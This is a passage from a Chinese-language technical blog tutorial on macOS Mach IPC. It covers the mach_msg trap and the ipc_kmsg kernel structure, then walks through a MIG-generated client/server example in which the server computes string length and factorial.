class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_overwrite_trap</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> mach_msg_overwrite_trap_args *args)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">      <span class="type">mach_vm_address_t</span>     msg_addr = args-&gt;msg;</span><br><span class="line">    <span class="type">mach_msg_option_t</span>       option = args-&gt;option;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>         send_size = args-&gt;send_size;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>         rcv_size = args-&gt;rcv_size;</span><br><span class="line">    <span class="type">mach_port_name_t</span>        rcv_name = args-&gt;rcv_name;</span><br><span class="line">    <span class="type">mach_msg_timeout_t</span>      msg_timeout = args-&gt;timeout;</span><br><span class="line">    <span class="type">mach_msg_priority_t</span>     <span class="keyword">override</span> = args-&gt;<span class="keyword">override</span>;</span><br><span class="line">    <span class="type">mach_vm_address_t</span>       rcv_msg_addr = args-&gt;rcv_msg;</span><br><span class="line">    __unused <span class="type">mach_port_seqno_t</span> temp_seqno = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_msg_return_t</span>  mr = MACH_MSG_SUCCESS;</span><br><span class="line">    <span class="type">vm_map_t</span> map = <span class="built_in">current_map</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Only accept options allowed by the user */</span></span><br><span class="line">    option &amp;= MACH_MSG_OPTION_USER;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (option &amp; MACH_SEND_MSG) &#123; <span class="comment">/* ... ipc_kmsg_send(xxx) ... */</span> &#125;</span><br><span class="line">    <span class="keyword">if</span> (option &amp; MACH_RCV_MSG) &#123; <span class="comment">/* ... ipc_mqueue_receive_on_thread(xxx) ... */</span> &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> MACH_MSG_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>ipc_kmsg_t</code> 结构体即待发送的内核消息，结构体如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>            ikm_size;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span>            *ikm_next;        <span class="comment">/* next message on port/discard queue */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span>            *ikm_prev;        <span class="comment">/* prev message on port/discard queue */</span></span><br><span class="line">    <span class="type">mach_msg_header_t</span>          *ikm_header;      <span class="comment">// 指向 Mach Message 的指针</span></span><br><span class="line">    <span class="type">ipc_port_t</span>                 ikm_prealloc;     <span class="comment">/* port we were preallocated from */</span></span><br><span class="line">    <span class="type">ipc_port_t</span>                 ikm_voucher;      <span class="comment">/* voucher port carried */</span></span><br><span class="line">    <span class="type">mach_msg_priority_t</span>        ikm_qos;          <span class="comment">/* qos of this kmsg */</span></span><br><span class="line">    <span class="type">mach_msg_priority_t</span>        ikm_qos_override; <span class="comment">/* qos override on this kmsg */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_importance_elem</span> *ikm_importance;  <span class="comment">/* inherited from */</span></span><br><span class="line">    <span class="type">queue_chain_t</span>              ikm_inheritance;  <span class="comment">/* inherited from link */</span></span><br><span class="line">    <span class="type">sync_qos_count_t</span> sync_qos[THREAD_QOS_LAST];  <span class="comment">/* sync qos counters for ikm_prealloc port */</span></span><br><span class="line">    <span class="type">sync_qos_count_t</span> special_port_qos;           <span class="comment">/* special port qos for ikm_prealloc port */</span></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> MACH_FLIPC</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_node</span>           *ikm_node;        <span class="comment">/* Originating node - needed for ack */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>该结构体中包含了较多字段，其中存在一个指向待发送 Mach message 的指针。</p><p>受限于知识储备，内核中的具体细节留待更进一步的分析。</p><h2 id="八、MIG">八、MIG</h2><h3 id="1-概述">1. 概述</h3><p>一说到 Mach IPC 后，一个不得不提到的东西便是 <strong>MIG(Mach Interface Generator)</strong>。但这里我们不过多了解 MIG 中非常具体的使用方式与编写语法，只简单了解一下它的功能与意义等等。</p><p>通过上面的例子我们可以知道，Mach IPC 可以用与 **RPC（远程过程调用）**中。通俗的讲，它可以做到：<strong>当 Client ”调用“ 某个远程方法时，Server 将从 Mach IPC 中收到信息并实际执行该方法，最后将调用结果再通过 Mach IPC 返回给 Client，以实现 Client 的透明调用。</strong></p><p>那么如果 Client 需要调用的方法<strong>很多</strong>，那对于开发者而言，除了<strong>需要完成方法的实际实现</strong>以外，他们还得<strong>手工</strong>完成 <strong>Mach IPC 之间的信息处理与分发</strong>等等<strong>重复乏味且机械的工作</strong>，开发效率极低。</p><p>因此， MIG 的使用可以帮助我们完成后者，解放生产力，让开发人员更关注于方法的实现。</p><p>MIG 可以从<strong>用户编写的 RPC 规范文件</strong>（.defs 文件）中，生成出 CS 架构的代码。这些代码将自动完成 Mach Message 的准备、发送、接收、解包等等功能。同时由于代码是自动生成的，因此可以提高代码一致性，降低代码发生错误的可能。</p><p>MIG 将会生成三个文件，分别是</p><ol><li>用于用户 include 的一个头文件</li><li>client 端的一个源文件，用于和 client 的其他代码所链接。</li><li>server 端的一个源文件，用于和 server 端的其他代码所链接。这部分代码会自动完成消息接收，事件分发，函数调用，信息回复等操作。</li></ol><p>以下是一个示例：<br><img src="/2021/12/mach_ipc_intro/image-20220105175226555.png" alt="image-20220105175226555"></p><h3 id="2-CS-架构程序示例">2. CS 架构程序示例</h3><h4 id="a-概述">a. 概述</h4><p>这部分我们将简单了解一下如何使用 MIG 创建一个简单的 CS 程序。</p><p>在这个 CS 架构项目中，Server 程序会提供两个接口 ：</p><ul><li><code>string_length</code>：获取传入字符串的长度</li><li><code>factorial</code>：计算传入数字的阶乘</li></ul><blockquote><p>该示例来自于：*OS Internal Vol 1</p></blockquote><h4 id="b-杂项公共头文件">b. 杂项公共头文件</h4><p>首先，给出 Client 和 Server 的<strong>杂项</strong>公共头文件：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// misc_types.h </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> _MISC_TYPES_H_ </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> _MISC_TYPES_H_ </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span> </span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// The server port will be registered under this name. </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MIG_MISC_SERVICE <span class="string">&quot;MIG-miscservice&quot;</span> </span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// Data representations </span></span><br><span class="line"><span class="keyword">typedef</span> <span class="type">char</span> <span class="type">input_string_t</span>[<span class="number">64</span>]; </span><br><span class="line"><span class="keyword">typedef</span> <span class="type">int</span> <span class="type">xput_number_t</span>; </span><br><span class="line"> </span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123; </span><br><span class="line">    <span class="type">mach_msg_header_t</span> head; </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// The following fields do not represent the actual layout of the request </span></span><br><span class="line">    <span class="comment">// and reply messages that MIG will use. However, a request or reply </span></span><br><span class="line">    <span class="comment">// message will not be larger in size than the sum of the sizes of these </span></span><br><span class="line">    <span class="comment">// fields. We need the size to put an upper bound on the size of an </span></span><br><span class="line">    <span class="comment">// incoming message in a mach_msg() call. </span></span><br><span class="line">    NDR_record_t NDR; </span><br><span class="line">    <span class="keyword">union</span> &#123; </span><br><span class="line">        <span class="type">input_string_t</span> string; </span><br><span class="line">        <span class="type">xput_number_t</span> number; </span><br><span class="line">    &#125; data; </span><br><span class="line">    <span class="type">kern_return_t</span>      RetCode; </span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">msg_misc_t</span>; </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="type">xput_number_t</span> <span class="title">misc_translate_int_to_xput_number_t</span><span class="params">(<span class="type">int</span>)</span></span>; </span><br><span class="line"><span class="function"><span class="type">int</span>           <span class="title">misc_translate_xput_number_t_to_int</span><span class="params">(<span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"><span class="function"><span class="type">void</span>          <span class="title">misc_remove_reference</span><span class="params">(<span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">string_length</span><span class="params">(<span class="type">mach_port_t</span>, <span class="type">input_string_t</span>, <span class="type">xput_number_t</span> *)</span></span>; </span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">factorial</span><span class="params">(<span class="type">mach_port_t</span>, <span class="type">xput_number_t</span>, <span class="type">xput_number_t</span> *)</span></span>; </span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">endif</span> <span class="comment">// _MISC_TYPES_H_ </span></span></span><br></pre></td></tr></table></figure><p>在这个头文件中，定义了两个类型 <code>input_string_t</code> 和 <code>xput_number_t</code>，并声明了一些函数。</p><p>在这些函数中，有两个是目标接口声明，另外3个是 MIG 生成的代码内部会调用到的，一会再说明。</p><p>其中的 <code>msg_misc_t</code> 结构体声明只用于 Server 调用 mach_msg_server 函数时指定最大 message 长度，不会实际实例化该结构体。</p><h4 id="c-RPC-defs">c. RPC defs</h4><p>之后，再给出 defs 文件：</p><blockquote><p>defs 文件中的一些符号说明，已经以注释的形式写入 defs 中，下面不再赘述。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * A &quot;Miscellaneous&quot; Mach Server </span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * File:    misc.defs </span></span><br><span class="line"><span class="comment"> * Purpose: Miscellaneous Server subsystem definitions </span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Subsystem identifier </span></span><br><span class="line"><span class="comment"> * 指定当前的 mig 中的接口ID 从 500 开始，同时该文件所生成的模块均以 `misc` 命名</span></span><br><span class="line"><span class="comment"> * 这里的字符串也会影响到输出的 `*Server.c`、 `*User.c` 等文件的命名</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line">Subsystem misc <span class="number">500</span>; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Type declarations </span></span><br><span class="line"><span class="comment"> * 类型规范部分：用于定义函数调用参数的数据类型</span></span><br><span class="line"><span class="comment"> *     MIG支持简单类型、结构化类型、指针类型和多态类型的声明。</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span> </span></span><br><span class="line"></span><br><span class="line">type <span class="type">input_string_t</span> = array[<span class="number">64</span>] of <span class="type">char</span>; </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * 这里可能要稍微说明一下</span></span><br><span class="line"><span class="comment"> * 首先，设置 xput_number_it 的类型为 int</span></span><br><span class="line"><span class="comment"> * InTran 指定当函数传入 int 时，如果需要将其转换成 xput_number_t 类型，则调用 misc_translate_int_to_xput_number_t 函数转换</span></span><br><span class="line"><span class="comment"> * OutTran 指定当函数需要输出 int 时，如果需要将其从 xput_number_t 类型转换，则调用 misc_translate_xput_number_t_to_int 函数来转换</span></span><br><span class="line"><span class="comment"> * Destructor 指定当 xput_number_t 类型的变量需要析构时，执行该函数</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">type <span class="type">xput_number_t</span>  = <span class="type">int</span> </span><br><span class="line">         CType      : <span class="type">int</span> </span><br><span class="line">         InTran     : <span class="type">xput_number_t</span> <span class="built_in">misc_translate_int_to_xput_number_t</span>(<span class="type">int</span>) </span><br><span class="line">         OutTran    : <span class="type">int</span> <span class="built_in">misc_translate_xput_number_t_to_int</span>(<span class="type">xput_number_t</span>) </span><br><span class="line">         Destructor : <span class="built_in">misc_remove_reference</span>(<span class="type">xput_number_t</span>) </span><br><span class="line">    ; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Import declarations </span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;misc_types.h&quot;</span>; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Operation descriptions </span></span><br><span class="line"><span class="comment"> * 需要注意的是，每个函数声明中，至少要包含一个 mach_port_t 类型的参数。</span></span><br><span class="line"><span class="comment"> * 一方面，在 Client 中，这个参数指定了向哪个 Server 发起调用</span></span><br><span class="line"><span class="comment"> * 而另一方面，Server 中具体方法的实现也可以获取到一个 mach_port_t 类型的值，从而判断调用者</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* This should be operation #500 */</span> </span><br><span class="line"><span class="function">routine <span class="title">string_length</span><span class="params">( </span></span></span><br><span class="line"><span class="params"><span class="function">                         server_port : <span class="type">mach_port_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                      in instring    : <span class="type">input_string_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                     out len         : <span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"><span class="comment">/* Create some holes in operation sequence */</span> </span><br><span class="line"><span class="comment">// 跳过序列中的 501、502、503，这里的 skip 操作可以保持接口的兼容性，有点类似于 protobuf</span></span><br><span class="line">Skip; </span><br><span class="line">Skip; </span><br><span class="line">Skip; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* This should be operation #504, as there are three Skip&#x27;s */</span> </span><br><span class="line"><span class="function">routine <span class="title">factorial</span><span class="params">( </span></span></span><br><span class="line"><span class="params"><span class="function">                     server_port : <span class="type">mach_port_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                  in num         : <span class="type">xput_number_t</span>; </span></span></span><br><span class="line"><span class="params"><span class="function">                 out fac         : <span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Option declarations </span></span><br><span class="line"><span class="comment"> * 这里设置了两个 Prefix，这些 Prefix 会分别作为所调用的/所实现的 IPC 操作函数名称前缀</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line">ServerPrefix Server_; </span><br><span class="line">UserPrefix   Client_; </span><br></pre></td></tr></table></figure><p>更多 MIG defs 语法可以参照 <a href="https://www.nextop.de/NeXTstep_3.3_Developer_Documentation/OperatingSystem/Part1_Mach/02_Messages/Messages.htmld/index.html">Using Mach Messages - NeXTstep 3.3 Developer Documentation</a>。</p><h4 id="d-Server">d. Server</h4><p>Server 源程序：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// server.c </span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;misc_types.h&quot;</span> </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">boolean_t</span> <span class="title">misc_server</span><span class="params">(<span class="type">mach_msg_header_t</span> *inhdr, </span></span></span><br><span class="line"><span class="params"><span class="function">                             <span class="type">mach_msg_header_t</span> *outhdr)</span></span>; </span><br><span class="line"></span><br><span class="line"><span class="comment">// InTran </span></span><br><span class="line"><span class="function"><span class="type">xput_number_t</span> </span></span><br><span class="line"><span class="function"><span class="title">misc_translate_int_to_xput_number_t</span><span class="params">(<span class="type">int</span> param)</span> </span>&#123; </span><br><span class="line">     <span class="built_in">printf</span>(<span class="string">&quot;misc_translate_incoming(%d)\n&quot;</span>, param); </span><br><span class="line">     <span class="keyword">return</span> (<span class="type">xput_number_t</span>)param; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// OutTran </span></span><br><span class="line"><span class="function"><span class="type">int</span> </span></span><br><span class="line"><span class="function"><span class="title">misc_translate_xput_number_t_to_int</span><span class="params">(<span class="type">xput_number_t</span> param)</span> </span>&#123; </span><br><span class="line">     <span class="built_in">printf</span>(<span class="string">&quot;misc_translate_outgoing(%d)\n&quot;</span>, (<span class="type">int</span>)param); </span><br><span class="line">     <span class="keyword">return</span> (<span class="type">int</span>)param; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// Destructor </span></span><br><span class="line"><span class="function"><span class="type">void</span> </span></span><br><span class="line"><span class="function"><span class="title">misc_remove_reference</span><span class="params">(<span class="type">xput_number_t</span> param)</span> </span>&#123; </span><br><span class="line">     <span class="built_in">printf</span>(<span class="string">&quot;misc_remove_reference(%d)\n&quot;</span>, (<span class="type">int</span>)param); </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// an operation that we export </span></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> </span></span><br><span class="line"><span class="function"><span class="title">string_length</span><span class="params">(<span class="type">mach_port_t</span>     server_port, </span></span></span><br><span class="line"><span class="params"><span class="function">              <span class="type">input_string_t</span>  instring, </span></span></span><br><span class="line"><span class="params"><span class="function">              <span class="type">xput_number_t</span>  *len)</span> </span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    <span class="keyword">if</span> (!instring || !len) </span><br><span class="line">        <span class="keyword">return</span> KERN_INVALID_ADDRESS; </span><br><span class="line"> </span><br><span class="line">    *len = <span class="built_in">strlen</span>(instring);</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="comment">// an operation that we export </span></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> </span></span><br><span class="line"><span class="function"><span class="title">factorial</span><span class="params">(<span class="type">mach_port_t</span> server_port, <span class="type">xput_number_t</span> num, <span class="type">xput_number_t</span> *fac)</span> </span>&#123; </span><br><span class="line">    <span class="keyword">if</span> (!fac) </span><br><span class="line">        <span class="keyword">return</span> KERN_INVALID_ADDRESS; </span><br><span class="line"> </span><br><span class="line">    *fac = <span class="number">1</span>; </span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">2</span>; i &lt;= num; i++) </span><br><span class="line">        *fac *= i; </span><br><span class="line"> </span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; </span><br><span class="line">    <span class="type">kern_return_t</span> kr; </span><br><span class="line">    <span class="type">mach_port_t</span> server_port;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">bootstrap_check_in</span>(bootstrap_port, MIG_MISC_SERVICE, </span><br><span class="line">                                 &amp;server_port)) != BOOTSTRAP_SUCCESS) &#123; </span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), server_port); </span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;bootstrap_check_in:&quot;</span>, kr); </span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">mach_msg_server</span>(misc_server,            <span class="comment">// call the server-interface module </span></span><br><span class="line">                    <span class="built_in">sizeof</span>(<span class="type">msg_misc_t</span>),     <span class="comment">// maximum receive size </span></span><br><span class="line">                    server_port,            <span class="comment">// port to receive on </span></span><br><span class="line">                    MACH_MSG_TIMEOUT_NONE); <span class="comment">// options </span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Server 端要做的事情稍微多一点：</p><ol><li><p>程序执行时，Server 将 server port 注册进 bootstrap 中。</p><p>初次之外，Server 还执行 <code>mach_msg_server</code> 函数，使当前进程一直循环处理 Mach Message。</p><p>mach_msg_server 函数的第一个参数指定了 MIG 生成的 <code>misc_server</code> 处理例程，该例程会根据传进的 Mach Message 执行指定的接口。</p></li><li><p><strong>Server 端实现了两个接口的具体实现</strong>。当 Server 接收到 Client 端发来的信息时，这两个方法将在 miscServer.c 中被调用。</p></li><li><p>除此之外，Server 还实现了其他 MIG 中会调用的函数。</p></li></ol><h4 id="e-Client">e. Client</h4><p>Client 源程序：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// client.c </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;misc_types.h&quot;</span> </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INPUT_STRING <span class="string">&quot;Hello, MIG!&quot;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INPUT_NUMBER 5 </span></span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="type">int</span> </span></span><br><span class="line"><span class="function"><span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span> </span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    <span class="type">kern_return_t</span> kr; </span><br><span class="line">    <span class="type">mach_port_t</span>   server_port; </span><br><span class="line">    <span class="type">int</span>           len, fac; </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// look up the service to find the server&#x27;s port </span></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, MIG_MISC_SERVICE, </span><br><span class="line">                                &amp;server_port)) != BOOTSTRAP_SUCCESS) &#123; </span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;bootstrap_look_up:&quot;</span>, kr); </span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>); </span><br><span class="line">    &#125; </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// call a procedure </span></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">string_length</span>(server_port, INPUT_STRING, &amp;len)) != KERN_SUCCESS) </span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;string_length:&quot;</span>, kr); </span><br><span class="line">    <span class="keyword">else</span> </span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;length of \&quot;%s\&quot; is %d\n&quot;</span>, INPUT_STRING, len); </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// call another procedure </span></span><br><span class="line">    <span class="keyword">if</span> ((kr = <span class="built_in">factorial</span>(server_port, INPUT_NUMBER, &amp;fac)) != KERN_SUCCESS) 